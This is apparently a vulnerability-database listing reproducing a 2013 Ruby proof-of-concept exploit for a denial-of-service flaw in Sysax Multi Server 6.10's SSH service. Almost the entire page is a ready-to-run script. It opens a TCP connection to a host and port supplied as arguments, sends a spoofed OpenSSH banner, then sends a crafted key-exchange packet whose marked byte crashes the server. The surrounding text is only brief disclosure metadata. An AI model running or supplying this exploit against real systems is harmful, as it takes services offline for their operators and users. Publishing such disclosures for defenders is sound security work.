Sysax Multi Server 6.10 SSH Denial Of Service

🗓️ 10 Apr 2013 00:00:00Reported by Matt AndrekoType
packetstorm🔗 packetstormsecurity.com👁 16 Views
Sysax Multi Server SSH DoS attack using 6.10 version utilizing a specific crafted packet to cause denial of service
`#!/usr/bin/env ruby  
# Sysax Multi Server 6.10 SSH DoS  
# Matt "hostess" Andreko < mandreko [at] accuvant.com >  
# http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html  
  
require 'socket'  
  
unless ARGV.length == 2  
puts "Usage: ruby #{$0} [host] [port]\n"  
exit  
end  
  
packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,  
0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,  
0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,  
0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,  
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,  
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65,  
0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d,  
0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64,  
0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,  
0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,  
0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,  
0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,  
0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65,  
0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e,  
0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34,  
0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69,  
0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c,  
0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f,  
0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31,  
0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d,  
0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d,  
0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61,  
0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62,  
0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63,  
0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,  
0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,  
0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d,  
0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66,  
0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61,  
0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35,  
0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,  
0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,  
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73,  
0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c,  
0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c,  
0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73,  
0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75,  
0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31,  
0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61,  
0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74,  
0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36,  
0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d,  
0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,  
0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,  
0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77,  
0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63,  
0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38,  
0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,  
0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c,  
0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32,  
0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f,  
0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39,  
0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65,  
0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,  
0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,  
0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,  
0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,  
0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,  
0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c,  
0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,  
0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,  
0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00,  
0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64,  
0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,  
0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63,  
0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e,  
0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c,  
0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70,  
0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68,  
0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65,  
0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70,  
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,  
0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73,  
0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68,  
0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d,  
0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d,  
0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68,  
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,  
0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34,  
0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68,  
0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61,  
0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64,  
0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63,  
0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31,  
0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73,  
0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68,  
0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31,  
0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63,  
0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00,  
#3rd byte in this next line causes crash  
0x00, 0x00, 0x28, 0x7a, 0x6c, 0x69, 0x62, 0x40,  
0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e,  
0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62,  
0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00,  
0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70,  
0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f,  
0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e,  
0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*")  
  
host = ARGV[0]  
port = ARGV[1]  
  
sock = TCPSocket.open(host, port)  
  
banner = sock.gets()  
puts banner  
  
sock.puts("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n")  
sock.puts(packet)  
resp = sock.gets()  
  
sock.close()  
  
`
10 Apr 2013 00:00Current
0.3Low risk
Vulners AI Score0.3